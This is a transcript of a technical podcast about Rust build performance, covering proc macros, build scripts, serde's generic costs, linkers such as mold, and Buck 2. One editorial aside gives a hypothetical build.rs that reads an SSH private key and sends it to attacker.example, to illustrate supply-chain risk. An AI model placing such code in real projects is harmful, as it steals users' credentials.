It's not really the experience that anyone wants, especially when you're trying to debug your proc macro. And, you know, on the one hand it's like, god, I wish it were different, but I can see why it's the way it is, and it's tough. And, Rain, can I ask: is that just something you kind of knew? How were you able to make the leap to, wait a minute, I know that there's a different panic setting for proc macros?

Speaker 5:

This is not something I knew before doing this investigation. So I started doing the investigation, and I'm like, okay, it looks like there are, like, 7 copies of serde_json being built. And I'm like, why are there 7 copies of serde_json being built? So I started looking at all the individual copies and seeing what they said. And in some cases it said those copies were built with unwind, and in other cases it said those copies were built with abort.

Speaker 5:

So I started scratching my head, and I looked at our workspace Cargo.toml where we specify these settings, and it just said panic = abort for dev builds. So I started looking at it, and I'm like, okay, this is something weird that Cargo is doing. And then I literally went to github.com/rust-lang/cargo.

Speaker 5:

And in the search box up top, I typed in unwind. And, you know, people like to hate on GitHub code search these days, but the first result it provided was exactly relevant. It showed me that there is actually a line in Cargo which forces panic = unwind for proc macros and build scripts, for this exact reason: that this is a plugin.

Speaker 5:

So it needs to be unwind; abort doesn't really work.

Speaker 1:

Yeah. And so, I guess, were you surprised by that? I mean, you probably had the same reaction we did. It's like, well, I guess I understand it in hindsight, but I'm disappointed to learn this.

Speaker 5:

Yeah. I was definitely... I mean, the moment I saw the reasoning for it, I'm like, yeah, of course. Right. But, you know, it was definitely surprising coming into it.

Speaker 5:

Yeah.

Speaker 1:

Yeah. And then, on that, I mean, there's not an easy resolution. Right? We have to basically just change our disposition in our debug builds. Yeah. We need to kind of let the Wookiee win on this one.

Speaker 1:

We can't actually fight with how they wanna compile proc macros.

Speaker 5:

Yeah. Yeah. So we still ship release builds with panic = abort set, but debug builds do set unwind now. You know, that's the trade-off. Right?

Speaker 5:

You know, I'm fine with it, but one of the reasons we like panic = abort is that there are cases where invariants can end up breaking with panic = unwind. And I have a long rant about how standard mutexes are the correct mutex because of this, which I can go into later. But the fact is that we have a divergence between dev and prod now, and we gotta live with that.

Speaker 1:

Yeah. And it's all in tension. And what was the win, in terms of not rebuilding all this stuff? Because I think the best way to get a win in a system is to avoid doing work completely, as opposed to speeding up work, and this avoids a lot of work. Right?

Speaker 5:

Yeah. So, the work that I ended up doing to figure this out and kind of put this to bed once and for all: it's hard to give a single number, because a lot of it depends on the exact behaviors. But there were a bunch of cases; Omicron pull request 4535 includes this and a whole bunch of other changes that made this work. Some things that were taking 20-plus seconds to rebuild now just took one second. Overall, for a common scenario, with 4 specific runs, this ended up being a 1.26x speedup, which was pretty sweet. So, you know, again, a lot of it depends.

Speaker 5:

And as Sean alluded to, none of this helps with an individual crate taking a very long time. Right? This helps in other scenarios. So we are still dominated by those long poles, but at least we can improve some of these incremental steps a bit.

Speaker 1:

Yeah. Interesting. And so, you know, we're talking about proc macros and build scripts. Most people have at least heard of proc macros, and then build scripts are kind of the hard drugs that proc macros lead you to. And I have found that you can bloat your compile times very significantly when you get a little bit of a build script problem, which I may have had from time to time. You know, I'm trying to kick it.

Speaker 1:

I'm trying to be clean, but, you know, every day is a struggle.

Speaker 5:

I love build scripts. I mean, they're good.

Speaker 1:

I love build scripts so much. I wanna party right now. Let's go do a build script right now. You know, I don't care that I just got out of rehab. I'm ready to roll.

Speaker 1:

I love build scripts, and I kinda feel like the discovery of build scripts... you know what, Cliff showed me build scripts, and he was regretting it as he was doing it, and then immediately regretted it completely. He's like, why am I doing this? You're not gonna handle this information responsibly. And I definitely have not. I'm sorry.

Speaker 3:

No, it's good. They're just another place where the handling of inputs and outputs, and making sure that you're caching stuff correctly, matters. It's another area where there's a very particular way to make sure that you can do this right. I encountered this yesterday, actually: if you have a build script where the dependencies of the build script change, but the build script is emitting some artifact, some output, and that output is exactly the same...

Speaker 3:

Even though only the dependencies of your build script have changed, everything downstream from it will require recompilation, even though the build script is emitting the exact same artifact. It's avoidable, you can get around this, but it requires some careful setup to do, and it's definitely not the default; by default, you recompile the world.
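
A sketch of the kind of careful setup being alluded to (the file and variable names are hypothetical). Declaring the script's real inputs keeps cargo from rerunning it, and therefore from invalidating everything downstream, when unrelated things change:

```rust
// build.rs
use std::{env, fs, path::PathBuf};

fn main() {
    // Without these directives, cargo reruns the script whenever anything
    // in the package changes. Narrow the triggers to the actual inputs:
    println!("cargo:rerun-if-changed=schema/config.json");
    println!("cargo:rerun-if-env-changed=CONFIG_PROFILE");

    // Emit generated code into OUT_DIR, as usual.
    let out = PathBuf::from(env::var("OUT_DIR").unwrap());
    let schema = fs::read_to_string("schema/config.json").unwrap();
    fs::write(out.join("generated.rs"), codegen(&schema)).unwrap();
}

// Hypothetical code generator.
fn codegen(schema: &str) -> String {
    format!("pub const SCHEMA: &str = {schema:?};")
}
```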

Speaker 1:

Yeah. That's interesting. And it's kind of a surprising result. And so, Sean, I know you've also spent some time just on the performance of proc macros. What were some of the things that you found, in terms of what affected build times there?

Speaker 1:

And, actually, how did you find that stuff? Because, again, I think that's half the trick here, or more: the tooling to actually understand where we're actually spending time.

Speaker 3:

So, for proc macros in particular, this is one of the areas where you need to understand, within a single crate's timing, where the time is going. Building the proc macro crate itself, you can usually see that from something like the cargo build --timings flag. But if you're using proc macros, like, let's say you have a bunch of calls to serde. You're using serde's derives in a bunch of your code, you're using serde_json, you're using a bunch of derives. That's a pretty common thing to do.

Speaker 3:

How much does that cost you? That sort of information would show up inside a single crate's build time. So this is kind of a good segue from what we were discussing earlier, where we were talking about generics and the cost, the binary size, of what a generic costs. But that's, as I mentioned earlier, a proxy for the real signal, which is: why is it taking so long to build?

Speaker 3:

And if you actually wanna get information about why a single crate is taking long to build, the compiler actually does provide a self-profiling flag that's pretty decent here. I really want to see more tooling built around this. I personally want to build more tooling around how to interpret it, because the feedback is really powerful, but it requires some analysis to make use of it. It's, I believe, a rustc flag, the self-profiling one.

Speaker 3:

You can pass arguments to this thing, and you basically get out a JSON file that describes, on a timeline, every single step along the way that the compiler was working on. If you do this with the default arguments, it basically gives you the names of a bunch of internal compiler passes, which is not that useful. Seeing, oh, codegen and LLVM passes took up 90% of the time of building this crate: it's a little informative, but it's not as informative as which module you were working on.

Speaker 3:

Like, what functions were you actually doing work on to produce the thing that you produced? You have to massage this thing to get specific output, but you can get that insight there: hey, this is actually what is going on inside the build. Part of the reason I want better tooling around this is that the output is a JSON file, and there are some tools built around it, like summarize is one, and I can give a link in the chat to where the family of tooling around this lives. But if you have a large crate that's filled with a bunch of stuff that's taking a while to build, and you're trying to figure out where the slowest spots are, you basically need to take that JSON file, do an analysis on it, figure out what is optimizable, run your own summations on different submodules, and figure out what the common patterns are. For those next steps, you're pretty much on your own with that JSON file.
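
A sketch of that flow; the flags are rustc's unstable self-profile interface, and summarize comes from the rust-lang/measureme repository:

```console
# Nightly only. Each rustc invocation writes a .mm_profdata file.
# "my-crate" is a hypothetical crate name.
$ RUSTFLAGS="-Zself-profile -Zself-profile-events=default,args" \
      cargo +nightly build -p my-crate

# Aggregate one profile into a table of where the time went.
$ summarize summarize my_crate-<pid>.mm_profdata
```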

Speaker 1:

Right. Right. You're definitely off-road at that point. But I mean, it must be wild, the amount of information you're getting out of the compiler about what's going where. What did you discover? Have you been able to go into that and make progress on where time is being spent?

Speaker 3:

Well, the first thing I discovered was that if you ask for the self-profiling to run on something like our control plane, and you do it without asking for any extra arguments, it gives you output that's in the tens to hundreds of megabytes. But if you ask it to actually profile with arguments, to tell you, okay, actually identify when you're working on compiling every type, every function, like, write down the function you're working on and when, then it goes up into the gigabytes range of size. And there was a u32 overflow that we bumped into. Which I just find so poetic, right? Of course: it's a crate that's emitting a bunch of output, you're doing a bunch of stuff. Isn't that the type of thing that you'd want to be optimizing? I get that if you have a simple reproducible case you can put into, like, a hello.rs file, you can just do that.

Speaker 3:

That would be useful if you're trying to write a repro case for the compiler. But if you're actually trying to analyze a real crate that's very large, like, haven't other people bumped into this? But anyway, that's fixed on nightly right now, and it will be rolling into the next stable release. So everyone else can look forward to that and not bump into the same problem. But, yeah, that's part of why I think more tooling needs to be built here: it is kind of difficult to analyze that file right now.

Speaker 3:

Like, I think it contains all the information that one would need, but you get a very, very narrow slice of what you're actually working on in the system. And I think we need tools to give you aggregates based on modules, and aggregates based on functions, especially for the case where you're deriving something, so the symbols are specific to where you happen to use that derive. Like, if I tried to give you an answer for the cost of using serde's derives, of deriving Serialize and Deserialize across all the structs in our crate, I'd love to say, roughly this much of the total time was spent doing that. But that's not really easy to do right out of the box.

Speaker 1:

Unless you've got the right tooling that's able to interpret it.

Speaker 3:

Yeah. Yeah. That's an area where I'm interested in making investments over the next few months. And if anyone listening to this is interested and has similar Rust projects where they wanna get better insight there, I would point you all in that direction, because I think there's a lot of low-hanging fruit here.

Speaker 3:

Because this tool is really, really powerful for getting that good analysis on a large crate, but it needs more support.

Speaker 1:

Well, and I think it's fair to say that more and more people are going to run into these kinds of issues, and there's gonna be more and more demand for this kind of tooling. Obviously, there are organizations that have had Rust in production longer than we have here at Oxide, but for a lot of things, we're relatively close to the leading edge, as your u32 overflow indicates. That's a good indicator that you're towards the leading edge of something. And I think a lot more people are coming, because there are so many advantages to Rust for software in the large.

Speaker 1:

It feels like something a lot of other people are gonna hit and are gonna wanna get resolved.

Speaker 2:

Hey, Sean. As you were describing some of the things you're hitting with serde, it really sort of took the bloom off the rose a little bit for me. Like, I view serde as this unassailable marvel. But as you started to explain some of the extreme use of generics and what the code actually turns into, it did sort of make me look at it in a different light. And so I'd love to hear more about your analysis of serde, and then also some of the other crates you kicked over as potential alternatives.

Speaker 3:

Yeah. So I definitely looked into a few of them. I don't really think we've pulled the trigger on any of them yet, but it sort of has opened my eyes to, oh, I get it now why a lot of these alternatives exist. Like, I didn't really understand why before. Serde seems great. If you can use it, it's so flexible.

Speaker 3:

Like, why would you need something like miniserde? It seems like it's just less useful, right? Or maybe you have some environment where you really, really care about a limited set of things, but why would I care about something like that if serde is working for me? You sort of have to accept that there's a trade-off you're making there for generality. Code that is not generic, that fits a specific use case, that doesn't cause increased code generation, and that doesn't have to work over more generic objects is just gonna take less time to compile.
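[As a concrete sketch of that generality (the struct is invented; serde with its derive feature and serde_json are assumed as dependencies): the derive emits impls generic over any data format, and the compiler then monomorphizes them per format you actually use.]

```rust
use serde::{Deserialize, Serialize};

// The derive below generates `impl Serialize` and `impl Deserialize`
// bodies that are generic over *any* data format, which is exactly
// the flexibility, and the extra codegen, being discussed.
#[derive(Serialize, Deserialize)]
struct Instance {
    id: u64,
    name: String,
}

fn main() {
    let inst = Instance { id: 1, name: "vm0".into() };
    // JSON here is just one instantiation of that generic machinery;
    // a second format like CBOR would instantiate it all over again.
    let json = serde_json::to_string(&inst).unwrap();
    println!("{json}");
}
```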

Speaker 2:

Yeah. It's like, sure, all of our API objects could be serialized into CBOR or something, but we don't. We always serialize into JSON.

Speaker 2:

So there's a bunch of generality there that we frankly don't need.

Speaker 4:

So I also wanna say, I think part of what you're experiencing, Adam, is the back and forth between these things. Like, think back to your old self using C, and be like: add a couple lines of code, and you get a fully fledged, super fast parser for your custom struct with no work.

Speaker 1:

Totally magic.

Speaker 4:

Now that's, like, normal, and so we're starting to deal with some of the downsides of how those things are implemented, but those downsides only register because everything was so wonderful. Like, at Rust 1.0, proc macros weren't in the language. One of the largest uses of nightly was people using compiler plugins, which were the predecessor to proc macros, because these use cases were that compelling. But because they were built around compiler internals, they broke constantly. And it was a huge pain in the butt, but they were so valuable that people suffered all these different kinds of pain to actually use them.

Speaker 4:

And then Rust 1.15 was a really, really big, important release, because it was the thing that stabilized derive macros, if I remember correctly. It's been many years by now, but that was a huge day. And right after that, nightly usage dropped significantly, because people could actually move to stable for these kinds of use cases. And so I think there's a natural back and forth, right, where you get new functionality, and then it becomes the new normal. And then you're like, why do I gotta pay all these downsides for this thing?

Speaker 4:

But it's also worth remembering that, like, before this world, we also had downsides. And in many ways, they were, you know, worse.

Speaker 1:

Oh, Steve, are you telling us that we're ready for the truth: that there are no zero-cost abstractions? That that was a lie that had to be told in order to get us to adopt it?

Speaker 4:

So it's funny, because the C++ people have been trying to say "zero-overhead abstractions" more recently. And by more recently, I mean, like, the last 10 years or so. But the meme was so strong that nobody changes it. Because everything has a cost. It's true. It's about where that cost is allocated.

Speaker 1:

And I think that, on balance, for so many of these things, the pain points are only going to happen at scale. And Rust is so much better on so many of these things than other languages and environments. So it's almost, I don't know, reassuring, Adam, in a strange way, that you're disappointed. You're just learning the truth.

Speaker 2:

Your parents are fallible. I think it's just that I found so much unequivocal beauty in serde, as you were saying, Steve, and then to find that there was a perhaps hidden cost. I don't know.

Speaker 2:

Just surprising. Not that it takes any of the beauty away, but it makes you think that in some circumstances it's not gonna be the right tool. There are trade-offs for the application. There are places where I'd maybe want something more specialized, or, you know, some other kind of library.

Speaker 1:

Yeah. And, Sean, it's kinda what you were saying too, about giving you a perspective on generics versus trait objects. These are different tools in the toolbox at different times, and I may want one or the other for different reasons.
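[A minimal sketch of that toolbox choice (function names invented): a generic function is monomorphized once per concrete type it's called with, while a dyn trait object keeps a single compiled body and pays a vtable indirection instead.]

```rust
// Monomorphized: the compiler emits a fresh copy of `log_generic`
// for every T it's instantiated with; fast calls, more codegen.
fn log_generic<T: std::fmt::Display>(value: T) {
    println!("{value}");
}

// Dynamic dispatch: one compiled body, calls go through a vtable;
// less codegen (and less compile time), a little runtime indirection.
fn log_dyn(value: &dyn std::fmt::Display) {
    println!("{value}");
}

fn main() {
    log_generic(42);      // instantiates log_generic::<i32>
    log_generic("hello"); // instantiates log_generic::<&str>
    log_dyn(&42);         // the same single body serves both calls
    log_dyn(&"hello");
}
```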

Speaker 3:

Yeah. And I think I'm coming in here being a little bit critical of things: well, what about all those cases where you're deriving things? What about cases where you're generating code? What about cases where you're generic? And part of the reason that I'm critical here is because I have the mindset of: I'm analyzing code.

Speaker 3:

I'm trying to find things that are potential offenders, that cause the compiler to spend a lot of time churning. But I do wanna back up a second and say: I love serde. It's a great tool. Right? Like, it's very, very useful.

Speaker 3:

And I've reached for it, and I will continue reaching for it in the future as well. It's just, yeah, totally understanding that these things have costs.

Speaker 1:

How can we reduce these costs as much as we can? Sorry, Rain, I think you were trying to get in there.

Speaker 5:

Oh, I was just gonna say that I really love serde. My biggest concern just tends to be that the ecosystem has committed to serde. It's like a commitment that has been made: pretty much every Rust crate supports serde in some fashion or other. And so we have all of this baked in.

Speaker 5:

So we have gone down this monomorphization path. If we wanna switch to something like miniserde, which actually uses dyn, like, trait objects using dyn and stuff, then all of a sudden we have to kind of redo all of this work across the ecosystem. And the commitment is the thing that kind of chews on me a bit.

Speaker 1:

Yeah. Interesting. And then, Sean, you also discovered things about link times. So we generate large static executables here with Rust, and that puts new pressure on the linker.

Speaker 1:

Do you wanna talk about some of the stuff you found there?

Speaker 3:

Yeah. So this was an interesting case where we actually bumped into issues that are kind of more platform-specific. We've been talking a lot about build speed, right? We're talking about different build configurations, which is all lumped into the category of: you walk up to a machine and you run cargo build.

Speaker 3:

But that's only part of the picture for us internally at Oxide. The thing that we really are trying to track at the end of the day is the developer velocity experience, which is more than just building, right? It's how long does it take to build your code? How long does it take to package it up, put it onto a target machine, deploy that machine, get a control plane up and running, get the whole system running and boot VMs, and then get things onto GitHub, get your PRs merged, and move on with your life? It's the whole process, and there are a lot of different phases to this.

Speaker 3:

So this is one of those areas where we definitely noticed a distinction between folks that were developing on some platforms versus others. And this is one of those cases where, admittedly, I think a lot of the credit goes to a handful of other folks that did more of this investigation. I know Rain did a lot of this. I know Dan Cross, who I think is here today in the audience, also spent quite a bit of time on analysis here as well. But this is one of those cases where, for a certain number of crates, we are operating on a very, very large number of files.

Speaker 3:

I mean, we have our control plane. It is split into multiple crates, but at the end of the day, there is one binary being built that links together all of these different artifacts and crates. On certain operating systems, we would notice the build time would tank at the end. It would be a bottleneck of many minutes to actually finish building this binary. And you would definitely hit this on any single-character change, right? You'd have to go through this many-minute process to rebuild this binary.

Speaker 3:

And that was very painful for developers going through that experience. So, yeah, I can jump into more detail on what we found out within the linker, if you want.

Speaker 1:

Yeah, please. In terms of, like, what our experiences have been with mold, mold being an alternative linker.

Speaker 3:

So, to Cargo's and rustc's credit, it's actually fairly straightforward to swap which linker you want to use. This was something where we had the theory of: maybe the link time is slow, and this is an area we can improve. And we could get pretty good times comparing ld versus lld versus mold on different operating systems. There's a small asterisk in there: on certain systems it actually took a little bit of extra work to get mold to build. But it wasn't too bad, a couple of patches and we could get there. And in particular, if you're building a lot of crates, for each individual one it doesn't make much of a difference.
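[For context, swapping linkers in a Cargo project is a couple of lines of configuration. A minimal sketch, assuming a Linux GNU target with mold installed; the target triple and linker driver vary by platform:]

```toml
# .cargo/config.toml -- route the final link step through mold
[target.x86_64-unknown-linux-gnu]
linker = "clang"
rustflags = ["-C", "link-arg=-fuse-ld=mold"]
```

[The other common approach is to wrap the whole build, as in `mold -run cargo build`, which intercepts the linker invocation without any config changes; these are presumably the "two separate ways" Rain mentions below.]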

Speaker 3:

But if you're talking about that situation where you are assembling a binary that is itself composed of many crates, pulling all of these large pieces together, where you're running one large service that is the amalgamation of many other pieces, we saw a huge, huge difference there. Going from ld to lld we saw a significant jump, and mold was basically the best option across all the systems we looked at. The difference there was quite drastic.

Speaker 3:

It's many minutes' worth of difference for the objects that we're building.

Speaker 1:

And Rain, you've been a longtime mold user. Mold is new to me, and I don't know how mold-fluent you are, Adam. Yeah, I'm a mold novice as well.

Speaker 1:

But, Rain, you mentioned you integrated it into your dev flow a long time ago.

Speaker 5:

Yeah. I think I saw a link on, like, Hacker News or something, and I was excited to try it out. I just love how easy mold is to integrate into Rust. It's so smooth. There are two separate ways to do it.

Speaker 5:

Each one of them has upsides and downsides. And so I started using it for my personal builds and stuff, like, I don't know, three or four years ago. And it's never had a bug. Well, actually, no, there was one case where it started crashing, but then I think the author released a hotfix.

Speaker 5:

But in general, it's been a super smooth process, and I've been trying to get everyone who's willing to listen onto mold.

Speaker 1:

Well, I think we got some pretty good numbers. I mean, the numbers are really pretty astonishingly good. And it definitely makes use of multiple cores.

Speaker 4:

Dan said in the chat that mold is 400 times faster than the illumos ld for building Omicron.

Speaker 1:

Yes. It is quite a bit faster.

Speaker 5:

Yeah. On Linux, I remember I was building, again, a single large service similar to Omicron. It was, like, 20 to 25x faster on a 12-core CPU.

Speaker 1:

Yeah. And it will be faster the more cores you've got; the more cores, the more upside you have there. Historically, the system linker has been single-threaded, because, for a bunch of reasons, there was a lot of movement away from static linking towards dynamic linking, and a lot of time and energy was spent on making dynamic linking perform really well. That's when disk space was at a premium, and memory was even more at a premium. I don't know when that started kicking back exactly, but maybe it was with Go that we got much larger statically linked binaries. And I think people were also just sick of the dependency hell that you had with shared objects, certainly ones that weren't versioned well; there were a bunch of challenges with shared objects.

Speaker 1:

And kind of the pendulum swung back, and it's like, actually, static linking is really, really important.

Speaker 5:

I think

Speaker 1:

And, you know, as Dan's saying in the chat, you've got a full-featured system linker that does really great stuff, but for the problem at hand, we actually want to just link really, really fast, and we need to do that by using multiple cores.

Speaker 5:

Yeah, I agree. And I think with Rust, monomorphization basically forces you, for the most part, into static linking, because

Speaker 1:

Interesting. Yeah.

Speaker 5:

You essentially are copying around object code, right? You don't have a single copy; you have lots of copies of a given function and so on. So this kind of ties back into the monomorphization thing.

Speaker 5:

Right? I think those things are pretty closely related.

Speaker 4:

And also, it has very interesting implications for the GPL. If you start pulling on this, it's a very deep, deep hole, with lots of implications that have been built up over a very long time and that are starting to unravel in ways now.

Speaker 1:

In terms of the linking exception with the GPL, or, I mean, what?

Speaker 4:

Rain was just talking about it. Like, if you're using a generic in Rust, the library has the sort of templates, to use a very overloaded word in this context, saved. And then when you link it against your code, you're then, like, writing code. You know, linkers are compilers. The whole separation of those two things is completely historical at this point, and not due to their actual abilities. Like, link-time optimization: linkers are optimizing compilers in a certain sense.

Speaker 4:

But yeah, it's very clear, at least to me, and I'm sure somebody in the chat will know of some big, giant thing that's been written about this. But when you're basically running code at link time and inserting that into a different binary, like, if I use a Rust crate that's GPL'd, is that gonna make my project GPL'd? You know? It's sort of all built around the C compilation model, and for things that don't follow that model, it gets a little weird.

Speaker 1:

Well, I think it's in part because of that ambiguity that, in the crate ecosystem, it's MIT and Apache, right? And you don't see a lot of GPL. You see some LGPL, but you don't... I think that's the kids, for that reason.

Speaker 4:

And I include the kids as being millennials at this point. I think there's been an industry-wide rejection of the GPL, and Rust is just part of that. Unfortunately, sort of? Maybe? Question mark? I don't know.

Speaker 4:

I have really complicated feelings about this topic. It's a whole different episode.

Speaker 1:

Yeah. I would say not "unfortunately." So we'll have to have that debate: the Lincoln-Douglas debate, GPL v. MIT.

Speaker 5:

And,

Speaker 1:

Brian, did you

Speaker 2:

did you see, with regard to proc macros, David Tolnay's proposal to compile proc macros into WASM and then just execute the WASM to generate code? Have you been plugged into this at all?

Speaker 1:

No. Where do I... yeah, what do

Speaker 2:

Yeah. I'll put it in the show notes. I'm gonna give the simpleton's version of the history here, and then I'll let Steve and Sean and Rain clean it up. I think the simple version is: David has wanted something like this for a very long time, and got so frustrated in about June or July, August, sometime during the summer last year, that he sort of surreptitiously built a mechanism. Or not surreptitiously; that makes it sound nefarious. But he built a mechanism into serde's derive that included some precompiled binaries.

Speaker 2:

And then after a few releases, or maybe immediately, opinions differ, some folks sniffed this out and weren't that into it: the fact that there were binary blobs executing in these environments. So there was a big kerfuffle, and this change, which had been around for a little while, was reverted. But then David wrote a great kind of proto-RFC, which, again, I'll link in the notes.

Speaker 2:

But, Steve Klabnik, how did I do? Is that within 50% of accurate?

Speaker 4:

Yeah. I think you did a very good job. I think it's

Speaker 5:

There you go.

Speaker 4:

difficult, because a lot of this depends on opinions about what happened. And so I think you did a good job of neutrally describing it, when it's very easy to non-neutrally describe it.

Speaker 1:

Maybe too neutral. What is it that mattered?

Speaker 2:

Yeah. But the short of it is, there'd be a bunch of changes to Cargo and to crates.io and so on and so forth. But the result would be: you're not compiling the proc macro, and, as Rain alluded to, you're not recompiling it and recompiling it depending on sundry different flags or whatever. You're just executing this WASM. And you'd also just opt into it.

Speaker 2:

Like, if you wanna recompile it, go for it. If you wanna use this WASM binary blob, use that. And then there are a bunch of other benefits. You know, talk about build.rs: it's kind of crazy, Brian, that if you include a random crates.io dependency, it could run a build.rs or proc macro code that could do literally anything on your system.

Speaker 3:

Yes. Right? It could, like Yes.

Speaker 1:

You know, it could read a

Speaker 2:

bunch of secret files and open a network socket and vomit them to it. Pretty astounding. So part of the benefit here would be being able to run this stuff in a sandboxed environment.
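[To make that concern concrete, here is a minimal, entirely hypothetical build.rs sketch of the failure mode being described; the path and host are invented, and the point is simply that nothing in Cargo today prevents a dependency from shipping something shaped like this:]

```rust
// build.rs -- runs arbitrary code, with your privileges, at build time.
use std::{fs, io::Write, net::TcpStream};

fn main() {
    // Nothing stops a build script from reading files it shouldn't...
    if let Ok(secret) = fs::read_to_string("/home/you/.ssh/id_ed25519") {
        // ...or opening a network socket and vomiting them to it
        // (hypothetical host, for illustration only).
        if let Ok(mut sock) = TcpStream::connect("attacker.example:443") {
            let _ = sock.write_all(secret.as_bytes());
        }
    }
    println!("cargo:rerun-if-changed=build.rs");
}
```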

Speaker 1:

Yeah. Interesting. I can definitely see the appeal. My concern with this kind of stuff is always, like, what if it gets stale or goes wrong, you know? But I'm also so impressed, generally, with the robustness of the tooling in the Rust ecosystem. There just isn't a lot of that.

Speaker 1:

I guess Sean's issues aside, the u32 overflows aside, generally the tooling is awfully robust. You always get worried about "this object was not rebuilt when it should have been," which to me is always much more frightening than "we unnecessarily recompiled this object when we didn't have to." But maybe that's just my disposition towards correctness; if I have to choose between correctness and performance... Anyway, I don't think we've had a lot of problems with Rust not recompiling things, with it being too aggressive with respect to caching. So, Sean, what's the future here? You mentioned getting excited about some of the tooling, some of the profiling, and making use of that now that you've got these bugs fixed in the compiler, being able to build tooling on top of it. What's the future for the workflow and dev flow for Rust?

Speaker 3:

I don't know if this is accurate, so I'm gonna describe how it feels. It feels like a lot of the tooling that exists around single-crate profiling with Rust is built for people who are contributing to rustc and who want to understand how to make the compiler faster, which is a great disposition, and it's good that those folks have useful tools. I want the future of this tooling to be: here is the crate that you built, and this is where we spent time building it, in an easily digestible format where you, as the author of a crate, can understand each piece in each module, where derives are taking place, and what the overhead of generics is, navigating through your crate module by module. I think that'd be very, very powerful to have.

Speaker 1:

Right. You wanna be able to answer the question: what's taking so long? (Exactly.) And I think also, to date, Rust has done a pretty good job of allowing people to opt into asking that question, because there are gonna be a lot of Rust developers for whom, as we talked about at the top, compile time doesn't matter until it does. When you're first coming into Rust, you may be like, I'm not sure I see what all the hubbub is about.

Speaker 1:

Like, this thing compiles pretty quickly. And the next thing you know, it no longer compiles as quickly, because you've really gone to town on it, and you wanna allow people to easily answer that question. And, Steve, I know you've been playing around with Buck 2. Do you view that as... how important is that to the performance of build times? Where are you on that?

Speaker 4:

So, and I know this is purely because we have talked about it a lot of times, but Rain is far more qualified to talk about this topic than I am. I am but a simple baby starting to play with this thing, and I'm excited about it. But, yeah, I would actually redirect that question ever so slightly.

Speaker 1:

Rain.

Speaker 2:

Okay. Fuck you.

Speaker 5:

Yeah. Alright. So, putting things like Buck 2 in context: I think what Adam mentioned about shipping WASM for a proc macro or whatever, that is a special case of a kind of generic approach to caching, and specifically distributed caching. Right?

Speaker 5:

So let's say that we are in a world with fully reproducible builds. You know all your inputs, and you know that the output for a particular input, for a particular step in the unit graph, is exactly the same. So I think a lot of the wins at scale end up being thanks to distributed caching, where you have these caches that are kept warm by, say, CI machines, and then local developers can just pull those artifacts down, and the build system does that automatically.

Speaker 5:

Buck 2 is what I'd like to think of as a totalizing version of that. So, Buck 2 is a build system. It's a polyglot build system built by Meta. It is the successor to Buck 1. Buck 1 was written in Java; Buck 2 is written in Rust.

Speaker 5:

Buck is most closely similar to Bazel, if folks have heard of it. The way Buck and Bazel and such work is that they actually require what they call hermetic builds. So all your inputs must be specified in build files. You can't depend on anything in the environment. You can't depend on a system compiler.

Speaker 5:

You can't depend on any of those things. And in return, you get the ability to do distributed caching, which is absolutely crucial when you're building services at Google or Meta scale. I think Buck 2 is great for what it is. And, you know, in many ways I can see a future where we do switch to it.

Speaker 5:

I think there are some hurdles that we need to actually look at. One of them is that, as I mentioned earlier, Buck 2 is totalizing, which means that everything, all your dependencies, must be expressed in Buck's language so that Buck understands what's going on. That is the only way Buck can work at all. And there is a lot of good tooling built for this. My former coworker, Jeremy Fitzhardinge, built out a tool called Reindeer, which converts

Speaker 5:

Cargo.toml files into Buck build rules. It's pretty great. So for the most part, that works. You have to manually patch things up here and there, but it generally works. I think the other thing that you have to look out for is that we have a lot of tooling that assumes Cargo, mostly out of path dependence.
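[For a flavor of what "expressed in Buck's language" means, here is a hypothetical BUCK file in Starlark; the target and dependency names are invented, and the rule names assume Buck 2's Rust prelude:]

```python
# BUCK -- every dependency is an explicit target, so builds stay hermetic
rust_library(
    name = "db-model",
    srcs = glob(["src/**/*.rs"]),
    deps = [
        # third-party crates become Buck targets too, typically
        # generated from Cargo.toml by a tool like Reindeer
        "//third-party:serde",
        "//third-party:tokio",
    ],
)

rust_binary(
    name = "control-plane",
    srcs = ["src/main.rs"],
    deps = [":db-model"],
)
```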

Speaker 5:

So, you know, there's no particular reason it needs to be tied to Cargo, but we would have to port all of that tooling to using Buck. An example of that: in Omicron, we use a test runner called cargo-nextest. It's a test runner that I'm the primary author of. At the moment, it's tied pretty intimately to Cargo. That isn't inherently the case.

Speaker 5:

You know, we could spend, like, two or three months making it work against Buck 2. It would be fine. But that's an investment that we would need to make. Yeah.

Speaker 1:

I do love you calling Buck "Buck 1." It's kinda like the World War One, World War Two distinction. I mean, did they call it the Great Buck before there was Buck 2? And that's really interesting about the automated tooling, because I completely understand why these things have their own DSLs, but the DSL just steepens the ramp to get onto these things.

Speaker 4:

I was gonna make a joke much earlier in the episode, actually, about how, with your love of build scripts, I'm surprised I have not introduced you to Starlark yet. Because Starlark is the DSL, as you said, but it's actually a subset of Python that both Buck and Bazel use to

Speaker 1:

I got you.

Speaker 5:

script part

Speaker 1:

of the build. So I gotta tell you, the thing that I love about the build scripts is that they're in Rust. That's what I just love. I actually don't love Python. Sorry, Python.

Speaker 4:

I don't love Python either. There is a small discussion on the Buck issue tracker about writing Buck's build files in Rust, but I don't think that's going to happen realistically anytime soon.

Speaker 1:

So I will tell you that there have been a handful of times in my career when I thought I was actually gonna start crying, and one of them was at the hands of SCons, s-c-o-n-s, however you say it, which I feel is one of the predecessors to these systems. Maybe that's an inaccurate read of the

Speaker 2:

It is

Speaker 1:

lineage of build systems. What's that?

Speaker 4:

It is not an inaccurate read.

Speaker 1:

It's not inaccurate. Okay. And part of the problem there was that the language is loose, and you are having to modify the scripts of the build system, and there's very little guidance about the flow of execution, and there are no types; there's nothing to really guide you. And what I was trying to do was just weird enough that it was just really... You know, I always feel that when you're like, I'm very close to getting this working, and then that goes on for, like, 13 straight hours, you're like, now, actually, tears are welling. I have been convinced that I'm 10 minutes away from getting this to work for 13 hours, and I think I'm gonna start weeping. And then there was an even weirder one: WAF. Do you remember WAF, Steve?

Speaker 4:

I don't think I ever used it,

Speaker 1:

but I do know that it exists. Well, Node used it. I mean, build systems that we have discarded, we, humanity, have discarded. That's a grim graveyard of build systems no longer used.

Speaker 1:

But, so, I think

Speaker 4:

To provide a tiny amount of color on why you originally asked me this question and I pivoted it to Rain: basically, as part of all this work we've been talking about today... One of the first things I did at Oxide, meaningfully, was work on the build system for Hubris. And then Omicron sort of kinda has a build system in it too. And I was like, we already have two bespoke build systems, and this company is, like, 30 people. And so I was like, I'm gonna write the next standard, you know? Let's just go back and implement a good build system in Rust.

Speaker 4:

